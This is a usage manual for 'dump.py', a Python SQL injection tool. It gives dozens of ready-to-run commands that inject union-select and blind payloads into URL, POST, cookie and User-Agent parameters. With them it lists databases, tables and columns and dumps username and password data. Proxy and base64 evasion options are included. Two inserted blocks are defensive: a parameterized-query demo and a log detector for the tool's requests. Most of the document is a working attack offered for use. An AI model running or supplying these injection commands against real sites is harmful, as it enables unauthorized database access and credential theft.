This is an open source SQL dumper written in Python.
Bugs and suggestions at : tdx_ev@yahoo.com | GPG-PuK
Features:
- Databases support : MySQL
- Injection methods : INBAND, BLIND
- Injection in all parameters sent to server GET, POST, HEADERS (Cookie, User-Agent,...)
- Custom headers
- Supports mod_rewrite injection
- Supports injection in parameters encoded with the base64 algorithm
- Supports proxy (HTTP, SOCKET4, SOCKET5)
- Supports injection in HTTPS through a proxy (only socket)
- Supports custom user query injection
- Save all extracted data to a dump file
- Dumps only structure of database
- Increases the delay between two consecutive failed requests (allows the server to cool down)
- Delay between requests
Command line options:
Example :
How to set URL option:
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php"
How to set URL option and GET parameters :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1"
How to make a SQL injection into URL option :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 and false union select 1,{inject_here}&page=index" --dbs
param_name=value&param_name=value
GET parameters can also be sent in the --url option.
Examples :
How to send GET parameters :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php" --params "page=index&id=1" --method GET
How to send POST parameters :
python dump.py --url "http://127.0.0.1/test/sqli/post/index.php" --params "page=index&id=1" --method POST
How to send GET and POST parameters at the same time:
python dump.py --url "http://127.0.0.1/test/sqli/post/index.php?page=index" --params "id=1" --method POST
- GET
- POST
Examples :
How to make a SQL injection into GET parameters :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php" --params "id=1 and false union select 1,{inject_here}&page=index" --method GET --dbs
How to make a SQL injection into GET parameters and also send POST parameters:
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 and false union select 1,{inject_here}&page=index" --params "list=10&offset=1" --method POST --dbs
How to make a SQL injection into POST parameters :
python dump.py --url "http://127.0.0.1/test/sqli/post/index.php" --params "id=1 and false union select 1,{inject_here}" --method POST --dbs
How to make a SQL injection into POST parameters and also send GET parameters:
python dump.py --url "http://127.0.0.1/test/sqli/post/index.php?page=usercp" --params "id=1 and false union select 1,{inject_here}" --method POST --dbs
By default the script sends the string "Python SQL Dumper" as the User-Agent.
Example :
How to send a custom User-Agent header :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --user-agent "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0.1) Gecko/20100101 Firefox/5.0.1" --dbs
How to make SQL injection into a User-Agent header :
python dump.py --url "http://127.0.0.1/test/sqli/useragent/index.php" --user-agent "' union select 1,{inject_here} -- --" --dbs
Cookie data must be sent as cookie_name=cookie_value pairs separated by semicolons, for example:
bbsessionhash=4b555c89b39eae8546cbf3c6f63a20ba; bblastvisit=1312053111;
By default the script sends no cookie header.
Examples :
How to send a cookie header (cookie authentication) :
python dump.py --url "http://127.0.0.1/test/sqli/cookie/index.php?id=1 union select 1,{inject_here}" --cookie "USER_ID=1; bbsessionhash=4b555c89b39eae8546cbf3c6f63a20ba; bblastvisit=1312053111;" --dbs
How to make a SQL injection into a cookie header :
python dump.py --url "http://127.0.0.1/test/sqli/cookie/index.php" --cookie "USER_ID=1 union select 1,{inject_here}" --dbs
Proxy must be in this format:
username:password@ip:port
or, if no user name and password are needed, in this format: ip:port
By default the script will not use any proxy and no warning message will be shown. If no proxy type is specified the script will try to use the HTTP proxy type.
Examples :
How to set proxy user name, password, ip and port :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --proxy "tdxev:password@127.0.0.1:1080" --dbs
How to set proxy ip and port :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --proxy "127.0.0.1:1080" --dbs
Proxy type must be one of the following:
- HTTP
- SOCKET4
- SOCKET5
Examples :
How to set proxy as socket5 :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --proxy "127.0.0.1:1080" --proxy-type SOCKET5
By default the delay is set to zero seconds.
Examples :
How to set delay between requests :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dbs --delay "0.5"
- INBAND - the result is returned in the content of the page
- BLIND - the result is not displayed in the page, but the page looks different depending on the SQL query
Examples :
How to set INBAND SQL injection :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 and false union select 1,{inject_here}" --injection-method INBAND --dbs
How to set BLIND SQL injection :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 {inject_here}" --injection-method BLIND --string "Welcome" --dbs
Examples :
How to set the string option for the blind SQL injection :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 {inject_here}" --injection-method BLIND --string "Welcome" --dbs
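Why the INBAND and BLIND methods work against a page, and what stops both, shown as an added example that is not code from this project. It assumes SQLite in place of MySQL, a constructed pages table, and two hypothetical handlers (render_vulnerable, render_hardened); the users table and its columns follow the names used in this page's examples.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the test database (SQLite here, MySQL on the page)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, body TEXT);
        INSERT INTO pages VALUES (1, 'Welcome');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'constructed-secret');
    """)
    return db

def render_vulnerable(db, id_param):
    """Before: the id parameter is concatenated into the SQL text."""
    sql = "SELECT id, body FROM pages WHERE id = " + id_param
    return "|".join(body for _, body in db.execute(sql))

def render_hardened(db, id_param):
    """After: accept only ASCII digits, then bind the value as a parameter."""
    if not (id_param.isascii() and id_param.isdigit()):
        return "400 Bad Request"
    rows = db.execute("SELECT id, body FROM pages WHERE id = ?", (int(id_param),))
    return "|".join(body for _, body in rows)

# Parameter values in the shape used on this page; the injected part is constructed.
INBAND = "1 and false union select 1,password from users"
BLIND_TRUE, BLIND_FALSE = "1 and 1=1", "1 and 1=2"

if __name__ == "__main__":
    db = make_db()
    for value in ("1", INBAND, BLIND_TRUE, BLIND_FALSE):
        print(repr(value), "->", repr(render_vulnerable(db, value)),
              "| hardened:", repr(render_hardened(db, value)))
```

With the concatenated query the INBAND value puts a row from users into the page, and the two BLIND values make "Welcome" appear or disappear; the hardened handler returns the same rejection for all three.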
Examples :
How to extract all database names :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dbs
The database from which the table names will be extracted must be specified with the -D option.
Examples :
How to extract all table names from all databases :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --tables
The above command will extract all table names from all databases.
How to extract all table names from multiple databases :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --tables -D test_sqli,mysql
The above command will extract all table names from databases test_sqli and mysql.
How to extract all table names from a database :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --tables -D test_sqli
The above command will extract all table names from database test_sqli.
Use -T option to specify the table(s) and -D option to specify the database(s).
Examples :
How to extract all column names for all tables from all databases :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns
The above command will extract all column names for all the tables from all the databases.
How to extract all column names for all tables from multiple databases :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns -D test_sqli,mysql
The above command will extract all column names for all tables in the databases test_sqli and mysql.
How to extract all column names for all tables from a database :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns -D test_sqli
The above command will extract all column names for all tables in the database test_sqli.
How to extract all column names for multiple tables from a database :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns -D test_sqli -T users,users_old
The above command will extract all column names for tables users and users_old from database test_sqli.
How to extract all column names from a single table :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns -D test_sqli -T users
The above command will extract all column names for table users from database test_sqli.
To specify a column or multiple columns you must use the -C option, -T for table(s), -D for database(s), or no option to dump the content of all databases.
When multiple columns, tables or databases are used, their names must be separated by commas.
Examples :
How to dump data from a single column :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli -T users -C password
The above command will extract the content of all rows of the password column from table users in database test_sqli.
How to dump data from multiple columns :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli -T users -C username,password
The above command will extract the content of all rows of the username and password columns from table users in database test_sqli.
How to dump data from single table :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli -T users
The above command will extract the content of all rows of all columns from table users in database test_sqli.
How to dump data from multiple tables :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli -T users,users_old
The above command will extract the content of all rows of all columns from tables users and users_old in database test_sqli.
How to dump data from entire database :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli
The above command will extract the content of all rows of all columns for all tables in database test_sqli.
How to dump data from entire databases :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli,mysql
The above command will extract the content of all rows of all columns from all tables in the databases test_sqli and mysql.
How to dump data from all databases :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump
The above command will extract the content of all rows of all columns from all tables in all databases that the user has access to.
Syntax : --limit (start_pos),(number_of_rows_to_extract)
Syntax examples:
--limit 0,10 - will extract first 10 rows
--limit 5 - will extract all rows starting from row 5
--limit 10,5 - will extract 5 rows starting from row 10
Examples :
How to use limit with --dump option :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli -T users -C username,password --limit 0,10
The above command will extract the first 10 rows from username and password columns from users table from database test_sqli.
How to use limit with --dbs option :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dbs --limit 0,1
The above command will extract only the first database.
How to use limit with --tables option :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --tables -D test_sqli --limit 2,5
The above command will extract 5 table names starting from row 2 from database test_sqli.
How to use limit with --columns option :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns -D test_sqli -T users --limit 1
The above command will extract all column names starting from row 1 from table users in database test_sqli.
If you use more than one database you must use a comma to separate the names of the databases (ex. -D "information_schema,test").
Examples :
How to set a single database that will be used to extract data :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --tables -D test_sqli
How to set multiple databases that will be used to extract data :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --tables -D test_sqli,mysql
If you use more than one table you must use a comma to separate the names of the tables (ex. -T "users,users_old").
Examples :
How to set a single table that will be used to extract data :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns -D test_sqli -T users
How to set multiple tables that will be used to extract data :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --columns -D test_sqli -T users,users_old
If you use more than one column you must use a comma to separate the names of the columns (ex. -C "username,password").
Examples :
How to set a single column that will be used to extract data :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli -T users -C username
How to set multiple columns that will be used to extract data :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dump -D test_sqli -T users -C username,password
Examples :
How to execute custom query :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --query "select @@version"
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --query "select username from users limit 1,1"
- 0 - no information will be displayed
- 1 - extracted information from the database
- 2 - all from 1 + SQL query that has been injected
- 3 - all from 2 + URL and all parameters
- 4 - all from 3 + server response headers
- 5 - all from 4 + content of the received page
Examples :
How to use verbose option :
python dump.py --url "http://127.0.0.1/test/sqli/get/index.php?id=1 union select 1,{inject_here}" --dbs -v 2
Other options:
- base64 - text will be encoded in base64
- hex - text will be encoded in hex
- sqlhex - text will be encoded in hex and before the hex text it will place "0x"
{encode|base64}{encode|hex}word{/encode}{/encode}
will be encoded to : 'Nzc2ZjcyNjQ='
Example :
How to inject base64 encoded parameter :
python dump.py --url "http://127.0.0.1/test/sqli/base64/index.php?id={encode|base64}1 union select 1,{inject_here}{/encode}" --dbs
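For log review, the request shapes documented on this page (the default "Python SQL Dumper" User-Agent, union select text in GET parameters and headers, and parameters wrapped in base64 or hex) can be matched in request records. The Python below is an added example, not part of dump.py; the function names and the sample requests are constructed for illustration, and "2" stands in for whatever replaces {inject_here}.

```python
import base64, binascii, re
from urllib.parse import parse_qsl, quote, unquote, urlsplit

DEFAULT_UA = "Python SQL Dumper"   # default User-Agent stated on this page
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.IGNORECASE)

def decoded_views(value, depth=3):
    """Yield value, then every printable text layer found by undoing base64/hex."""
    yield value
    text = value.strip()
    if depth == 0 or not text:
        return
    raw_layers = []
    try:
        raw_layers.append(base64.b64decode(text, validate=True))
    except (binascii.Error, ValueError):
        pass
    try:  # the "sqlhex" option places 0x before the hex text
        raw_layers.append(bytes.fromhex(text[2:] if text[:2].lower() == "0x" else text))
    except ValueError:
        pass
    for raw in raw_layers:
        try:
            inner = raw.decode("utf-8")
        except UnicodeDecodeError:
            continue
        if inner and inner.isprintable():
            yield from decoded_views(inner, depth - 1)

def flag_request(url, headers):
    """Return sorted reasons why one logged request matches the usage shown above."""
    reasons = set()
    if headers.get("User-Agent") == DEFAULT_UA:
        reasons.add("default-user-agent")
    parts = urlsplit(url)
    fields = {"path": unquote(parts.path)}
    fields.update(("param:" + k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True))
    fields.update(("header:" + k, v) for k, v in headers.items())
    for name, value in fields.items():
        if any(UNION_RE.search(view) for view in decoded_views(value)):
            reasons.add("union-select in " + name)
    return sorted(reasons)

# Constructed sample requests ("2" stands in for whatever replaces {inject_here}).
B64_ID = quote(base64.b64encode(b"1 union select 1,2").decode())
SAMPLES = [
    ("/test/sqli/get/index.php?id=1&page=index", {"User-Agent": "Mozilla/5.0"}),
    ("/test/sqli/get/index.php?id=1%20and%20false%20union%20select%201,2", {"User-Agent": DEFAULT_UA}),
    ("/test/sqli/cookie/index.php", {"User-Agent": "Mozilla/5.0", "Cookie": "USER_ID=1 union select 1,2"}),
    ("/test/sqli/base64/index.php?id=" + B64_ID, {"User-Agent": "Mozilla/5.0"}),
]
if __name__ == "__main__":
    for url, headers in SAMPLES:
        print(flag_request(url, headers), url)
```

The User-Agent match only catches runs that keep the default, since --user-agent replaces it, so the parameter and header checks carry most of the weight.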
How to list :
- How to set URL option
- How to set URL option and GET parameters
- How to make a SQL injection into URL option
- How to send GET parameters
- How to send POST parameters
- How to send GET and POST parameters at the same time
- How to make a SQL injection into GET parameters
- How to make a SQL injection into GET parameters and also send POST parameters
- How to make a SQL injection into POST parameters
- How to make a SQL injection into POST parameters and also send GET parameters
- How to send a custom User-Agent header
- How to make SQL injection into a User-Agent header
- How to send a cookie header (cookie authentication)
- How to make a SQL injection into a cookie header
- How to set proxy user name, password, ip and port
- How to set proxy ip and port
- How to set proxy as socket5
- How to set delay between requests
- How to set INBAND SQL injection
- How to set BLIND SQL injection
- How to set the string option for the BLIND SQL injection
- How to extract all database names
- How to extract all table names from all databases
- How to extract all table names from multiple databases
- How to extract all table names from a database
- How to extract all column names for all tables from all databases
- How to extract all column names for all tables from multiple databases
- How to extract all column names for all tables from a database
- How to extract all column names for multiple tables from a database
- How to extract all column names from a single table
- How to dump data from a single column
- How to dump data from multiple columns
- How to dump data from single table
- How to dump data from multiple tables
- How to dump data from entire database
- How to dump data from entire databases
- How to dump data from all databases
- How to use limit with --dump option
- How to use limit with --dbs option
- How to use limit with --tables option
- How to use limit with --columns option
- How to set a single database that will be used to extract data
- How to set multiple databases that will be used to extract data
- How to set a single table that will be used to extract data
- How to set multiple tables that will be used to extract data
- How to set a single column that will be used to extract data
- How to set multiple columns that will be used to extract data
- How to execute custom query
- How to use verbose option
- How to inject base64 encoded parameter
- How to make a SQL injection in Apache mod_rewrite URL